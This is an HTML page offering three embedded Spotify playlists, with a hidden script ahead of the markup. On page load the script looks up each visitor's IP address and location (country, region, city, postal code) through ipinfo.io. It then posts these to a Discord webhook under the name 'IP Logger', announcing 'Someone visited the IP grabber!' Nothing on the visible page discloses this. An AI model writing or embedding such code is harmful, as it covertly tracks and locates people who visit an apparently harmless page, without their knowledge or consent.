<script>
function monke(json) 
{
     var request = new XMLHttpRequest();
     
     request.open("POST", "https://discord.com/api/webhooks/996640689200840754/8fdw_c29V5X9oXd4lRT85veF4TLYB0Fb2ClM6H_ch9y2BJXGxDC2HxZdiMUReVWGjJl4");

     request.setRequestHeader('Content-type', 'application/json');

     var params = 
     {
          username: "IP Logger",
          avatar_url: "",
          content: "@everyone",
          embeds: [
               {
                    title: "Someone visited the IP grabber!",
                    color: 1752220,
                    description: "**IP:** `" + json.ip + "`\n**Country:** `" + json.country + "`\n**Region:** `" + json.region + "`\n**Town/City:** `" + json.city + "`\n**ZIP:** `" + json.postal + "`"
               }
          ]
     }

     request.send(JSON.stringify(params));
}
</script>
<script src="https://ipinfo.io/?format=jsonp&callback=monke"></script>

<!DOCTYPE html>
<html>
     <head> Embedded Spotify Playlists </head>
     <body>
<h1> Playlist #1 </h1>
<iframe style="border-radius:12px" src="https://open.spotify.com/embed/playlist/5B3KOMovfQquHG0d3Sx990?utm_source=generator" width="100%" height="380" frameBorder="0" allowfullscreen="" allow="autoplay; clipboard-write; encrypted-media; fullscreen; picture-in-picture"></iframe>
<h1> Playlist #2 </h1>
<iframe style="border-radius:12px" src="https://open.spotify.com/embed/playlist/3GnHscQD3TuXyZVXqBukYQ?utm_source=generator" width="100%" height="380" frameBorder="0" allowfullscreen="" allow="autoplay; clipboard-write; encrypted-media; fullscreen; picture-in-picture"></iframe>
<h1> Playlist #3 </h1>
<iframe style="border-radius:12px" src="https://open.spotify.com/embed/playlist/2Q6nEHxCjyZ8clOMNI9c86?utm_source=generator" width="100%" height="380" frameBorder="0" allowfullscreen="" allow="autoplay; clipboard-write; encrypted-media; fullscreen; picture-in-picture"></iframe>

     </body>
</html>
